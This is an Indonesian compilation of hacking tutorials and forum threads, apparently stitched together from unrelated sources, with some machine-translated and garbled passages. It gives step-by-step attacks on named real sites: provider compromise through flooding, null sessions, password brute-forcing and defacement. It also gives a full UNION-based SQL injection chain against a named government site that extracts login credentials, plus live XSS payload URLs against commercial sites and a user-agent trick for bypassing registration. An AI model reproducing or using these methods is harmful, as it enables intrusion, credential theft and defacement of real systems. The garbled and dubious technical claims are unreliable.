setahu ane sich gan klo cheat itu berarti kecurangan, tetapi cheat terkadang fungsinya sangat vital bagi gamer yang menggunakannya. Ada juga fungsinya cuman sekedar buat nakutin lawan agar mentalnya down saat berhadapan dengan kita. Klo Hacker adalah sebutan untuk mereka yang memberikan sumbangan yang bermanfaat kepada jaringan komputer, membuat program kecil dan membagikannya dengan orang-orang di Internet, jd misal ada kelemahan suatu sistem maka seorang hacker akan menyusup untuk memperbaiki sistem tersebut beda dengan klo Cracker adalah sebutan untuk mereka yang masuk ke sistem orang lain dan cracker lebih bersifat negatif seperti merusak, mencuri sistem, mem-bypass password. Tapi terkadang seorang Cracker minta disebut dirinya seorang Hacker, sehingga istilah itu sampai sekarang digunakan bahwa yg merusak itu adalah hacker padahal itu Craker. OK brngkl ada salahnya mohon di betulkan agan2 sekalian atau yg ingin melengkapi silahkan aja

repost boleh kan ????

Cara hack website
Dea Cyndi Rahman Nyoto DARMO Darmi
Tangerang

Teknik Hacking Situs kaskus.us Dari Berbagai Macam Sisi
Oleh : Bokeph MemendeZ <memendez at linuxmail.org>
Menyingkapi banyaknya pertanyaan dari kaum hacker di Indonesia, mengenani seputar
penjebolan pusat tabulasi kaskus.us – http://www.kaskus.us.go.id, saya ingin berbagi
sedikit mengenai teknik yang lain untuk melakukan attack ke situs kaskus.us.go.id atau
situs lainnya!.
Dani “Xnuxer” Firmansyah mengunakan metode SQL Injection, yang beberapa waktu
yang lalu sempat dibahas oleh S’to/Jasakom dalam bukunya. Masih banyak teknik lain
yang dapat digunakan untuk melakukan attack ke situs-situs di Internet.
Berikut ini saya Bokeph MemendeZ dari HackerSFreakz, ingin membongkar habishabisan
seputar hacking kaskus.us dari berbagai macam sisi, selain dari sisi SQL
Injection. Seluruh informasi semata-mata yang terpaparkan dalam artikel berbentuk
tutorial ini semata-mata untuk ilmu pengetahuan dan teknologi bukan untuk tindakan
pidana / kejahatan. “Anda yang membaca, Anda yang mencoba, Anda yang menentukan”
… Indonesia “idol” Hacker!

Langsung saja menjawab pertanyaan ribuan orang, bagaimana cara hacking web
khususnya www.kaskus.us.go.id, tentunya semua orang ingin mengetahuinya dan
mencobanya serta menjadi populer. Bukan begitu? Langsung saja Anda baca tulisan
ringkas, padat, berisi, berbobot, dan inovatif berikut ini.
Beberapa langkah melakukan hacking website www.kaskus.us.go.id :
1. Anda harus mengetahui alamat web kaskus.us terlebih dahulu, yakni
www.kaskus.us.go.id à TARGET! It’s simple man…
2. Berapa IP dynamic dari web kaskus.us.go.id, cara melihatnya, anda dapat masuk ke
lingkungan ms-dos dengan cmd.exe / command.com dengan mengetikan ping (Seperti
pada Gambar I) – “ping www.kaskus.us.go.id”. Terlihat IP kaskus.us: 203.130.201.130 à
TARGET
3. Dimana web kaskus.us ini berada, apakah indonesia/amerika/india/dll serta provider
apa yang digunakan? Anda dapat masuk kembali pada lingkungan ms-dos dengan
mengetikan nslookup (Seperti pada Gambar I) – nslookup www.kaskus.us.go.id. Rupanya
kaskus.us mengunakan provider indosat.net.id untuk hosting webnya.
4. Langkah selanjutnya setelah dapat mendapatkan info : www.kaskus.us.go.id /
203.130.201.130 / Host Provider : Indosat.net.id Anda harus mengetahui sistim operasi
apa yang digunakan oleh kaskus.us.go.id serta indosat.net.id, Anda dapat melakukan
mengecek di http://www.netcraft.com

OS, Web Server and Hosting History for www.kaskus.us.go.id
http://www.kaskus.us.go.id was running Apache on FreeBSD when last queried at 13-
Sep-2004 10:00:25 GMT - refresh now
FAQ
OS
Server
Last changed
IP address
Netblock Owner
FreeBSD
Apache/2.0.48 (Unix) PHP/4.3.4
2-Apr-2004
203.130.201.130
PT TELEKOMUNIKASI INDONESIA
Linux
Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_perl/1.24_01 PHP/4.2.2 FrontPage/5.0.2
mod_ssl/2.8.12 OpenSSL/0.9.6b
31-Jul-2003
203.130.196.212
PT TELEKOMUNIKASI INDONESIA
Linux
Apache/1.3.19 (Unix) (Red-Hat/Linux) mod_perl/1.24_01 PHP/4.0.6 FrontPage/5.0.2
mod_ssl/2.8.1 OpenSSL/0.9.6
9-Jan-2003
203.130.196.102
PT TELEKOMUNIKASI INDONESIA
Linux
unknown
8-Jan-2003
203.130.196.102
PT TELEKOMUNIKASI INDONESIA
Linux
Apache/1.3.19 (Unix) (Red-Hat/Linux) mod_perl/1.24_01 PHP/4.0.6 FrontPage/5.0.2
mod_ssl/2.8.1 OpenSSL/0.9.6
26-Sep-2002
203.130.196.102
PT TELEKOMUNIKASI INDONESIA
Linux
unknown
25-Sep-2002
203.130.196.102
PT TELEKOMUNIKASI INDONESIA
Linux
Apache/1.3.19 (Unix) (Red-Hat/Linux) mod_perl/1.24_01 PHP/4.0.6 FrontPage/5.0.2
mod_ssl/2.8.1 OpenSSL/0.9.6
29-Jul-2002
203.130.196.102
PT TELEKOMUNIKASI INDONESIA
Linux
Apache/1.3.14 (Unix) mod_perl/1.24 PHP/4.0.6 FrontPage/4.0.4.3 mod_ssl/2.7.1
OpenSSL/0.9.6
30-Apr-2002
203.130.196.102
PT TELEKOMUNIKASI INDONESIA
Linux
Apache/1.3.20 (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.6
3-Oct-2001
202.159.35.90
Linux
Apache/1.3.20 (Unix) mod_fastcgi/2.2.10 mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.0.6
1-Oct-2001
202.159.35.90
OS, Web Server and Hosting History for www.indosat.net.id
http://www.indosat.net.id was running unknown on Windows 2000 when last queried at
6-Sep-2004 08:25:40 GMT - refresh now
FAQ
OS
Server
Last changed
IP address
Netblock Owner
Windows 2000
unknown
6-Sep-2004
202.155.27.132
International Transmission Center, Indonesia
Windows 2000
Microsoft-IIS/5.0
19-May-2004
202.155.27.132
International Transmission Center, Indonesia
NT4/Windows 98
Microsoft-IIS/4.0
12-Dec-2003
202.155.15.26
INDOSATnet
unknown
Microsoft-IIS/4.0
11-Dec-2003
202.155.15.26
INDOSATnet
NT4/Windows 98
Microsoft-IIS/4.0
24-Sep-2002
202.155.15.26
INDOSATnet
unknown
Microsoft-IIS/4.0
22-Sep-2002
202.155.15.26
INDOSATnet
NT4/Windows 98
Microsoft-IIS/4.0
3-Nov-2000
202.155.15.26
Indosat Internet Service Provider
5. Kita ketahui bahwa web www.kaskus.us.go.id mengunakan OS : Apache on FreeBSD.
Apache/2.0.48 (Unix) PHP/4.3.4 sedangkan www.Indosat.net.id mengunakan Windows
2000/NT on Microsoft-IIS/5.0/4.0
6. Pelajari kelemahan-lemahan yang ada pada Apache / FreeBSD (Unix) serta PHP/4.3.4
untuk direct hacking langsung ke website kaskus.us atau pelajari kelemahan-kelemahan
dari IIS 4.0/5.0 untuk hacking account kaskus.us di indosat.
Hacking www.kaskus.us.go.id lewat www.indosat.net.id
Setelah tim kami menganalisa selama beberapa pekan ini, akhir kami mendapatkan
kelemahan-kelemahan pada web server provider yang digunakan oleh kaskus.us sebagai
tempat penyimpanan hosting mereka, yakni :
1. Web Server IIS sendiri mempunyai kelemahan pada buffer jika terdapat permintaan
dengan menggunakan 3000+ karakter pada .htr file. Dengan perintah ini memungkinkan
remote user untuk mengeksesuki perintah2 untuk menguasai komputer target. Mustinya
.Htr file tidak dimasukkan sebagai ektensi frontpage.
2. Meskipun IUSR_HOST-INDOSAT & IWAM_HOST-INDOSAT tidak mempunyai
hak untuk melakukan ‘Open Office’ tetapi hal ini merupakan sebuah celah untuk user
dapat melakukan rpc ke /_vti_bin/shtml.dll untuk mendapatkan login anonymous dari
internet account, karena IUSR_HOST-INDOSAT & IWAM_HOST-INDOSAT telah
terbuka, meskipun vacum.
3. Hak akses dari web indosat http://202.155.0.10/cgi-bin me-mungkinan direktori
browsing dilakukan sehingga ada kecenderungan remote user melakukan browsing dan
mencari kelemahan lainnya. Meskipun yang dapat mengakses hanya orang-orang yang
subscribe ke hosting indosat itu sendiri.
4. Pada direktory /_vti_bin/ ditemukan Fpcount.exe. Program ini bermasalah pada NT
pada buffer merupakan suatu celah dimana IIS Hole dan dapat diakses dengan mudahnya.
5. HelpAssistant & SUPPORT_388945a0 terbuka oleh si Admin. Meskipun hanya team
Microsoft saja yang dapat mengaksesnya karena private password untuk support product
mereka, tapi hal ini merupakan ancaman untuk si web server itu sendiri.
Langsung Hacking kaskus.us lewat bugs indosat.net.id
1. Lakukan null koneksi (null connection)
2. Lakukan flood byte ke www.indosat.net.id / IP 202.155.0.10
3. Lakukan flood file ke www.indosat.net.id / IP 202.155.0.10
Setelah anda melakukan ketiga langkah diatas, akhirnya Anda dapat melakukan ‘net
view’ dengan mengunakan kelemahan mac address, seperti yang terlihat pada gambar.
Oops.. Rupanya orang-orang indosat suka juga dengan GAMES ya…? Sekarang Anda
dapat melihat sharing Direktori mereka! Begitu cerobohnya mereka tidak memikirkan 5
hal yang telah dibahas diatas.
Dengan melihat share folder, anda dapat mengunakan IPC$, C$, ADMIN$, dsbnya
semuanya dapat anda lihat, akan tetapi bagaimana dengan user dan password ? Menebak
password ? Terlalu lama dan belum tentu berhasil!! 2 Cara ampuh yang dapat anda
gunakan, yakni:
1. Gunakan program NAT (gratis untuk versi non-GUI) atau versi komersialnya $19
yakni NetTools. Dengan memanfaatkan netbios/mac-addr dari null connection anda dapat
melakukan cracking user dari kamus yang telah anda siapkan (download di internet –
gratis!)
NAT akan berjalan sampai kamus password anda habis, ada beberapa username dan
biasanya banyak username yang ceroboh, dalam kasus ini kami mendapatkan username
ceroboh dari RAHMAT yakni password ‘123456’ status Administrator, disini anda dapar
mengunakan program GetAdmin untuk membuat user baru + password atau untuk
merubah password Admin. Gunakan Remote Desktop Connection anda langsung Anda
remote computer target.
Masuk dengan mengunakan user : RAHMAT password : 123456, dan apa yang Anda
lihat sebuah tampilan Windows 2000 Server, waw…w semua username/password isp ada
disana, termasuk hosting kaskus.us anda dapat menemukan pada direktori sub. inetpub
mereka.
Cari default.html / index.html atau .asp / .php dan rubah dengan tulisan “Defaced by
Bokeph MemendeZ / ”. Jangan lupa backup file index mereka, jangan menjadi perusak.
Dan buku web browser ketik web www.kaskus.us.go.id, dengan tampilan simple
“Bokeph MemendeZ was back & here in your System Project / HackerSFreakz”/
2. Gunakan Program NETBRUFO, Program ini saya dapatkan dari seorang teman, yang
dulunya pernah heboh dalam dunia hacking di Indonesia serta pemimpin group hacking
di Indonesia yang di kenal sebagai : The Computer Underground, yakni Mr. Andry
Christian, saat ini beliau merupakan peneliti & pakar jaringan komunikasi khususnya
dalam scope keamanan jaringan komunikasi yang tergabung dalam Sekurindo.
Program simple yang diciptakan seperti layaknya program NAT, perbedaannya, pada
NAT kita harus memiliki kamus password, tetapi pada NETBRUFO, kamus file (dict.txt)
bersifat optional karena memiliki menu Brute Force, yang pengoperasiannya disesuaikan
dengan encryption yang ada pada SAM Windows System serta metode-metode enkripsi
yang lainnya.
Hanya dalam waktu kurang lebih 30 menit (untuk password normal a-z & 0-9 dengan
panjang 6 karakter). password administrator telah kami dapatkan dan kami dapat masuk
melalui IPC$, C$, ADMIN$, serta share folder lainnya atau dengan RDC (Remote
Desktop Connection), atau FTP, karena ftp dibuka dengan user dan password yang
dengan login Windows 2000 mereka.
3. Anda dapat mengunakan cara yang lain untuk melakukan tracing password over
Internet. Software-softwarenya telah banyak beredar di Internet, biasanya software yang
dapat trace dengan mengunakan SAM sangat jalan, meskipun itu ada, tetapi kita harus
investasi. Coba buka-buka kembali majalah NeoTek, kalau tidak salah pernah dipaparkan
program2 networking scanner untuk tracing password.
Kalau tidak salah, Mr. Andry Christian pernah memaparkan software buatannya di PCPlus,
entah versi berapa? Selama ini saya hanya mengunakan software NETBRUFO dan
WEBTRACE dari King Jones –Australia, karena software tersebut sangat mudah dan
password yang dapat dicrack akurat pula. Barang kali URLnya masih ada, coba cek di
http://www.sampah.org/netbrufo.zip dan http://www.sampah.org/webtrace.zip
Contoh Program NETBRUFO untuk Hacking Via BruteForce & Kamus
Contoh Program WEBTRACE untuk Hacking Via BruteForce & Kamus
Hacking www.kaskus.us.go.id lewat bugs *nix (Apache/BSD)
Kini tiba saatnya hacking lewat bugs/hole/lobang dari *nix, sering-sering surfing lihat
informasi seputar kemanan di Internet, sitenya sangat banyak sekali, anda bisa
mencarinya di google (tutorial juga tersedia). Di Jasakom telah banyak tutorial hacking
*nix, teknik dan langkah-langkah tidak perlu diuraikan lagi, yang perlu hanya
exploitsnya, bukan?
Kami sudah test exploit root-attack.c (0day) di labs MicroStar Security Care, Kelapa
Gading, dan hasilnya sangat memuaskan. Dengan mudah, kami mendapatkan akses
admin, luar biasa!! Stop!! Jangan hanya compile pake gcc lalu jalankan masukin ip lihat
config, dsbnya, tapi coba pelajari langkah-langkah mereka itu yang terpenting. Untuk
bugs ini, kami sudah memberitahukan kepada Tim IT kaskus.us.GO.ID untuk
menambalnya, sebelum artikel ini dikeluarkan.
Jadi kami minta maaf, karena kami hanya membongkar yang sudah diperbaiki bukan
merusak!! Silahkan anda copy script exploit berikut ini, dan jalankan pada mesin *nix,
coba situs-situs yang memiliki kelemahan Apache/BSD yang lainnya, biasanya situs-situs
bertitik *.il *.nr *.kr masih lemah dan payah sistim kemanannya, untuk latihan silahkan
hajar situs-situs tersebut.
Download r00t-attack.c
· Kesimpulan
Seluruh isi yang dapat dalam tutorial ini bersifat ‘free’, bebas diketahui oleh siapa saja,
tanpa mengurangi rasa contribusi, kami memberikan kebebasan untuk dapat membaca,
menyimpan, mempraktekan seluruh isi yang tertera pada tutorial ini, bukan untuk
menjatuhkan pihak-pihak terkait atau mengkeruhkan keamanan web tetapi untuk
membuat mereka semakin mengerti arti keamanan di Indonesia. Adalah menjadi
tanggungan para pembaca seluruh isi dari tutorial ini, penulis tidak bertanggung jawab
atas apapun juga mengenai isi baik seluruh maupun sepenggal dari tutorial ini.
Pergunakanlah IPTEK untuk tujuan memajukan IT di Indonesia. Kami mengucapkan
terima kasih kepada orang-orang terkait yang ada didalam artikel ini,
Hacking website atau anggota seksi
Pertama, mengapa anda ingin hack webpage? Is tertentu halaman web atau situs di
semua? Ada banyak alasan untuk hack sebuah situs web, atau webmaster.Maybe Anda
ingin mengambil dendam atau mungkin anda ingin bersenang-senang atau hanya
mempelajari bagaimana untuk melakukannya! Anda dapat menghapus situs yang berarti
ganti asli dengan indeks yang baru atau Anda dapat memperoleh akses ke member area
situs yang mungkin lebih mudah.
Defacing
Anda dapat menghapus situs melalui telnet atau browser anda dengan menjalankan
perintah di remote tua atau misconfigured server, yang sulit untuk dilakukan adalah
menemukan server yang lama, mungkin jaringan sekolah atau universitas akan dilakukan,
mendapat CGI BuG searcher.This Program ini akan memindai kisaran IP untuk web
server dan akan memindai mereka untuk diketahui bug dalam cgis atau bug dan
holes.You dapat mempelajari cara exploite tertentu lubang dengan menambahkan yahoo
nama bug / lubang kata dan memanfaatkan , mencari "cmd.exe memanfaatkan." Terdapat
lebih dari 700 lubang yang mungkin ada banyak server! Anda juga dapat menghapus
sebuah situs web oleh mencari ftp password dan hanya mencari situs ftp dan mengganti
index.htm.You melakukannya dengan: kasar memaksa
Untuk melakukan itu Anda memerlukan pompa hewan atau hewan memaksa penyerang
dan beberapa kata daftar, yang mengirimkan beberapa hewan pompa user / lulus
permintaan kata yang picks dari namelists dan mencoba untuk hack account sampai it
does! So lets say a situs porno yang meminta password, you go there you menyalin
alamat mereka, Anda menambahkan alamat ke dalam sebuah program yang disebut
hewan pompa dan kemudian dari hewan pompa Anda memilih file teks dengan nama
yang akan digunakan sebagai pengguna dan teks dengan nama yang akan digunakan
sebagai password, maka hewan pompa akan mencoba sampai menemukan benar user /
lulus ini harus lebih mudah untuk pemula selain memanfaatkan bug cgi, banyak pemula
bahkan havent heard of it i hope i didnt confuse Anda dengan tutorial ini mungkin ada
lebih tuts tentang web hacking dan bug cgi such.Till dan kemudian mencoba untuk
mencari cara untuk bug cgi sendiri dengan cgi Scanners di Web Hacks bagian atau
mendownload crack kasar pompa ke account.
http://static.wetpaint.com/img/bg/1.png … 0619151023 punkey8oy
Latest punkey8oy halaman update: dibuat oleh punkey8oy, 19 Februari 2009, 7:04 PM
EST (about this update About This Update punkey8oy Diedit oleh punkey8oy
7 kata ditambahkan
melihat perubahan
- Lengkap sejarah)
Keyword tags: Website hacking
Info lebih lanjut: link ke halaman ini
Bookmark: Del.icio.us StumbleUpon Facebook
Benang untuk halaman ini
Oleh Thread Pelajaran dimulai Balasan Posting Terakhir
trishaf1963 hacking website 19 17 Juni 2009, 11:16 EDT oleh skeem1r
Thread mulai: 22 Desember 2007, 4:16 PM EST Watch
Hi saya baru disini dan tidak ada yang tahu tentang hacking, namun saya sungguhsungguh
ingin hack atau ada yang hacked websit tetapi tidak tahu cara untuk pergi
tentang itu, saya adalah alasan situs Advertises penjualan barang untuk mendapatkan
uang Anda lenyap dan tidak ada barang, mereka kerabit saya tentang biaya untuk 2 laptop
saya dekat 600 sugi saya tidak dapat melakukan banyak legaly menyebabkan saya tidak
punya bukti dan merupakan situs beijing, anyone help me on this, baik instruksi atau
sesuatu
mereka harus berhenti sebelum orang lain adalah frauded uang trishaf2001@yahoo.co.uk
17 dari 22 menilainya berharga. Apakah Anda menemukan ini berharga? Do you?
hacking web untuk pemula
gungbaster
20-05-2009, 09:07 PM
di karenakan banyak yg minat tentang hacking web iseng2 gue copasin aja teknik2 hack web dari
beberapa source (sebagian teknik hacking ini masih up to date sebagian dah di patch ama admin
situs yg di serang tapi metodenya masih bisa kok) >:D<
1st blood tentang xss neh
mungkin ada yg nanya apakah Xss itu
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan
melalui browser di client. Xss mungkin jenis serangan yang paling cupu bagi seorang attacker yang
tidak mempunyai Bug atau exploit. dikarenakan Xss hanya membutuhkan sebuah browser saja.
1. pertamanya seh kita kudu cari situs yg vurn (bisa di hacking dengan teknik xss) mencari situs
yang vulner emang gampang-gampang susah, karena kebanyakan situs udah memfilternya, tapi
kita bisa menggunakan google untuk cari neh vurn
Betul, kita menggunakan Dork dengan query inurl:"search.php?q="atau jika manual kita bisa
mencoba fasilitas sebuah site seperti Guest book, Search Box, Shoutboxes, Comment atau forum.
2. Nah sekarang jika sudah kita ketemukan target kita akan mencoba mengexploit site itu dulu,
apakah site itu mempunyai vulner terhadap XSS.
Ok sekarang kita coba menginjeksi dengan kode : <script>alert("XSS")</script>3.
http://i379.photobucket.com/albums/oo23 … 1l/xss.jpg << klo muncul gambar ini tuh situs
vurn buat di xss
4. tapi apakah sekedar itu saja, sekarang kita coba dengan metoda lain, apakah site itu bisa
dideface bro? bisa saja, sekarang kita coba bagaimana mengattack site yang vulner itu ok.
dengan penyisipan tag IMG SCR pada sebuah url atau pada comment sekali.
Apa itu IMG SCR tu bro? IMG SCR itu adalah semacam Tag pemangilan gambar dari suatu link
tertentu untuk ditampilkan kepada website tersebut.
pemanggilan tag itu dengan code sebagai berikut
<html><body><IMG SRC="http://Situs-Upload.com/Gambar_deface_lo.Jpeg"></body></html>5.
tapi terlebih dahulu gambar deface lo bisa upload dulu ke hostingan, misalnya ke photobucket atau
flickr. setelah itu ganti url nya dengan url gambar tadi.
hingga menjadi seperti seperti berikut : <html><body><IMG
SRC="http://Photobucket/Gambar_deface_gw.Jpeg"></body></html>6. nah setelah siap
kemudian sisipkan pada URl situs yang mempunyai bug tadi hingga menjadi seperti contoh :
http://www.Target.ac.id/search/?q=<h … gt;<IMG
SRC="http://Photobucket/Gambar_deface_gw.Jpeg"></body></html>7. kemudian apa yang
terjadi???
maka situs yang mempunyai bug tadi akan berubah tampilan menjadi gambar yang kita upload tadi

8. metode penyisipan lain selain dengan gambar juga bisa kita lakukan misalnya dengan file flash
(SWF) hingga serangan ini mempunyai style tersendiri contoh code yg di gunakan seperti ini >>>
<EMBED SRC="http://site.com/xss.swfdengan penyisipan tag tersebut maka akan langsung meng
exekusi file SWF pada link tersebut.
atau mungkin dengan melakukan redirect ke situs lain misalnya dengan code
:<script>window.open( "http://www.google.com/" )</script>9. yg maka jika dieksekusi , kita akan
di redirect ke situs google, mungkin biasa aja, tapi gimana klo dibawa ke suatu situs login palsu
misalnya fake login yahoo, mungkin bisa berbahaya juga tuh. gue rasa yg lebih master pasti tau apa
sebanya ini
Aurel 666@jasakom.com
teknik ke 2 menunya adalah sql injection (targetnya adalah http://www.gunungkidulkab.go.id
(http://www.gunungkidulkab.go.id/) << tapi neh web dah di patch adminnya (dolo neh web ancur
banget dah banyak yg jebolin sampe gak keitung) jadi untuk experiment sendiri cari aja web
korbannya sendiri
1. Lakukan pengecekan dengan memasukkan karakter tanda petik satu single_quote ( ' ) dan
mengujinya dengan operator logika ( AND ).
http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870'2.Halaman
akan menampilkan pesan error Fatal error: Call to a member function MoveNext() on a non-object
in
/var/www/sites/gunungkidulkab.go.id/gunungkidulkab.go.id/subdomains/www/html/program/publis
h_content.php on line 225berarti neh situs vurn
3. http://www.gunungkidulkab.go.id/home.ph … 70+and+1=1
http://www.gunungkidulkab.go.id/home.ph … +and+1=6Ha
sil Uji :
-Pada pengecekan AND+1=1 yang dihasilkan adalah TRUE, maka halaman akan tampil secara
normal.
-Pada pengecekan AND+1=6 hasilnya adalah FALSE, halaman akan menampilkan pesan kesalahan
(tidak berjalan normal).
4. Memeriksa jumlah field dari suatu tabel. Perintah yang digunakan adalah ORDER+BY+num,
lakukan penambahan/increment pada variabel num. Parameternya adalah jika field masih tersedia
maka halaman akan berjalan normal, namun sebaliknya jika field tidak tersedia maka halaman akan
menampilkan pesan error. Pada contoh kali ini ditemukan batas akhir field sampai pada angka 14.
http://www.gunungkidulkab.go.id/home.ph … order+by+1
4--Mengapa ada tanda -- diakhir perintah? Tanda -- adalah parameter komentar pada sintaks sql,
bisa juga menggunakan /*. Sesuai dengan fungsinya kita akan men-set komentar terhadap sintaks
setelah klausa WHERE. Kebetulan pada contoh kasus kali ini, setelah klausa WHERE terdapat
perintah sql yg lain entah itu ORDER atau LIMIT. Untuk itu digunakan parameter komentar agar
perintah sql tersebut tidak dijalankan sehingga kita mendapatkan pesan error jika field yang di
ORDER tidak tersedia.
Coba bandingkan jika parameter komentar tidak digunakan, meskipun kita melakukan ORDER BY 1
dan ORDER BY 100 halaman akan tetap menampilkan pesan error. Kalau kejadiannya seperti ini dari
mana kita bisa mengetahui jumlah field yang di-select??
5. Mengeluarkan nomor field untuk menampilkan informasi yang diinginkan. Perintah yang
digunakan adalah UNION+ALL+SELECT+no_field+no_field+.... sampai akhir
http://www.gunungkidulkab.go.id/home.ph … nion+all+s
elect+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14--6. Pada contoh kali ini, variabel id kita beri nilai null agar
angka-angka yang kita deklarasikan keluar, atau bisa juga menggunakan tanda minus (id=-870).
Dari angka-angka yang tercetak pada halaman web, kita akan mengeluarkan informasi dari versi
mysql, nama database dan nama user.
http://www.gunungkidulkab.go.id/home.ph … l&id=-
870+union+all+select+1,2,3,4,5,concat_ws(0x2B,vers
ion(),database(),user()),7,8,9,10,11,12,13,14--7. Selanjutnya kita akan mengeluarkan nama-nama
tabel dengan perintah UNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(TA
BLE_NAME)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TAB LE_SCHEMA=DATABASE().
Gunakan klausa WHERE TABLE_SCHEMA=DATABASE(), agar tabel yang keluar adalah tabel dari
database yang digunakan. Kalau Anda ingin melihat seluruh tabel dari seluruh database klausa
WHERE tidak perlu Anda
gunakan.http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=-
870+union+all+select+1,2,3,4,5,concat_ws(0x2B,vers
ion(),database(),user()),7,group_concat(table_name ),
9,10,11,12,13,14+from+information_schema.tables+ where+table_schema=database()--Pada
perintah diatas, Anda dapat mengganti concat_ws(0x2B,version(),database(),user()) dengan angka
6, jika Anda tidak ingin menampilkan informasi tentang versi mysql, nama database, dan nama
user.
8. Nama tabel telah kita ketahui, selanjutnya kita akan mengeluarkan nama field dari tabel yang
menyimpan UserID dan Password pengguna. Pada website ini nama tabel yang dimaksud adalah
tblpengguna. Sintaks dasarnya adalah
UNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(CO
LUMN_NAME)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+T ABLE_NAME='NAMA_TABLE'.
Jika terjadi error maka kita harus meng-konversi nama tabel ke bentuk hexadecimal_sql sehingga
menjadi 0x74626C70656E6767756E61
http://www.gunungkidulkab.go.id/home.ph … l&id=-
870+union+all+select+1,2,3,4,5,6,7,group_concat(co
lumn_name),9,10,11,12,13,14+from+information_schem
a.columns+where+table_name=0x74626C70656E6767756E6 1--9. Langkah terakhir kita akan
mengeluarkan record-record dari tabel tblpengguna. Sintaks dasarnya
UNION+ALL+SELECT+no_field+no_field+CONCAT_WS(PEMIS
AH_HEXA_SQL,NAMA_FIELD1,NAMA_FIELD2,....)+FROM+NAM A_TABLE. Kalau dijalankan pada
contoh kasus kali ini menjadi
:http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=-
870+union+all+select+1,2,3,4,5,6,7,concat_ws(0x2B,
tblpengguna_login,tblpengguna_pass),9,10,11,12,13, 14+from+tblpengguna--p1T4qH@
(666@jasakom.com)Jasakom Security Group (666@jasakom.com)
nb: itu adalah teknik dasar buat sql injektion terkadang di perlukan ketekunan untuk menemukan
bug di field dan table nya lo buat bisa injek (pokoknya dalam sql injection modalnya adalah sabar
dan jangan bosan :-O klo manual tapi untuk mempermudah biasanya di gunakan berbgai tools buat
sql injection )
menu ke 3 cara ngeliat forum atau website dengan googlebot (ngeliat tanpa perlu regis) for firefox
(ff)
1.step ketikan ini di kolom alamat situs firefox
about:config klo sudah entar ada peringatan gak papa masuk aja terus >> entar kalian akan liat
string register buat setingan firefox
2. masukan string ini di setingan register ff (bikin string baru dengan format text)
general.useragent.extra.firefox maka akan muncul defaultnya >> firefox/3.0.10 << ganti dengan
Googlebot/2.X (http://www.googlebot.com/bot.html)
3. restart ff klo bener kalian bisa liat beberapa web atau forum yg kudu regis tanpa perlu regis (di
status user akan terlihat ada googlebot << itu elu )
sebenernya neh trik lama tapi masih lumayan juga lo
nb: klo cara ini jalan lo bakalan susah regis di forum yg isa di tembus (soalnya kolom regisnya
ilang):P untuk beberapa forum dah gak isa pake cara ini soalnya dah make script baru atau di blok
oleh adminnya
gungbaster
20-05-2009, 09:12 PM
turut memanggil penunggu2 dan suhu2 sub forum ini untuk memberikan contoh hasil kerajinannya
dan memberikan tambahan (klo ada yg mau dateng )
@proceker
rasanya lo ada kan hasil xss situs kemaren bisa di tunjukin di sene gak? (buat contoh hasil xss)
walah yg di panggil budek gak muncul2
yg gak di panggil malah munculan wkwkwk
adit83
20-05-2009, 10:31 PM
turut memanggil penunggu2 dan suhu2 sub forum ini untuk memberikan contoh hasil kerajinannya
dan memberikan tambahan (klo ada yg mau dateng )
@proceker
rasanya lo ada kan hasil xss situs kemaren bisa di tunjukin di sene gak? (buat contoh hasil xss)
iya tuh om proceker masa kgk dateng :P
nih contohnya ya om:
website
4shared:http://www.4shared.com/network/search.jsp?sortType=1&sortOrder=1&sortmode=2&sear
chName=adit+pratama&searchmode=2&searchName=adit+pratama&searchDescription=%22%3E
%3Cscript%3Ealert(%27Xss%2 0nya%20kok%20ada%20sih%20by:adit83%27);%3C/script%3E
Asu eh asus deh : http://vip.asus.com/eservice/techservok … =enus&
caseid=%3Cscript%3Ealert(%22XSS%20ATTACK%20By%20---=====Adit83=====---
%22)%3C/script%3E%3CMARQUEE%20BGCOLOR=%22White%22%3E%3CH1%
3EXSS%20ATTACK%20By%20---=====Adit83=====---%3C/H1%3E%3C/MARQUEE%3E
satu lagi nih indocenter :
http://www.indocenter.co.id/bycategory. … 0nih%20---
=====Adit83=====---
gungbaster
20-05-2009, 10:57 PM
@adit83
good job
pembahasan clue code xss adit83 di asus
http://vip.asus.com/eservice/techservok … Ealert(%22
(http://vip.asus.com/eservice/techservok.aspx?SLanguage=enus&
caseid=%3Cscript%3Ealert%28%22)XSS%20ATTACK%20By%2 0---=====Adit83=====---
%22)%3C/script%3E%3CMARQUEE%20BGCOLOR=%22White%22%3E%3CH1%
3EXSS%20ATTACK%20By%20---=====Adit83=====---%3C/H1%3E%3C/MARQUEE%3E@buat
yg lom tau >:D<
untuk code di atas yg gue bold itu bisa di modif2 tulisannya lo sedangkan yg tulisan warna biru itu
buat warna isa di modif2 kok itu masih ada beberapa yg bisa di modif lagi silahkan temukan di
mana
nb: umumnya xss bekerja di client side aja
99hehe99
20-05-2009, 11:30 PM
Maap OOT kalo Pake Browser Musti Di mna ya?
Nemesis
20-05-2009, 11:53 PM
wah pd jago2X yah... /no1 ajarin dong...
(ask) menembus hadangan server/admin
--------------------------------------------------------------------------------
dr_veelgood07-05-2007, 08:24 PM
guys,gimana sih cara melewati hadangan server/admin yang memblock akses ke site
tertentu/menembus batas limit yg yang diberikan....???
misal
1.gw gak bisa masuk ke google karena di block oleh admin...gimana supaya gw bisa
masuk google tanpa perlu lapor ke admin?
2.gw coba DL file dari RS,tapi dilimit hingga 1 KB/s...gimana gw bisa tembus,diatas
batas yang ditentukan oleh admin?
--------------------------------------------------------------------------------
charles78908-05-2007, 04:09 AM
download dari rs transfer rate nya cuma 1 kb/s?itu artinya kecepatan transfer rate internet
km cuma 1 kb/s.biasanya semakin mahal bandwith yg km beli maka transfer rate km
akan makin bsr.sbg cnthnya gini:
kk sewa internet 64 kbps dedicated 1:1 maka km akan dpt transfer rate download sebesar
8 kb/s.dari manakah saya bisa blg dpt 8 kb/s.caranya gini:
64 kbps dibagi 8 bit maka hasilnya menjadi 8 kbps.
